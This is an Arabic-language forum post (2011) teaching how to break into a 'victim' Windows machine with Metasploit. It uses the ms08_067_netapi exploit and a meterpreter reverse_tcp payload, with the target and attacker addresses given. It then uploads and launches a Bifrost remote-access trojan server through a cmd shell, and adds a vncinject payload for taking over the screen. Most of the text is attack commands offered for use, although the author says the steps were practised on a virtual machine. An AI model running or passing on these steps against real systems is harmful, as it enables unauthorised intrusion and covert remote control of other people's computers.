شرح الاختراق بالميتا

من طرف **_MaFia_** الإثنين يناير 10, 2011 7:24 am

[CENTER] طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست

وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject

تم تطبيق الشرح على جهاز افتراضي

الشرح

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

ونختار windows/smb/ms08_067_netapi

show payloads

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

ونختار windows/ meterpreter/reverse_tcp

أو نختارها مباشرة كما ف الصورة

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445

**************************************************

لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

لتشغيل السيرفر start server.exe

*******************************************

وكما توضح الصورة نجاح تحميل السيرفر

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp

بتطبيق الثغرة ستفتح لنا الشاشة التالية

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]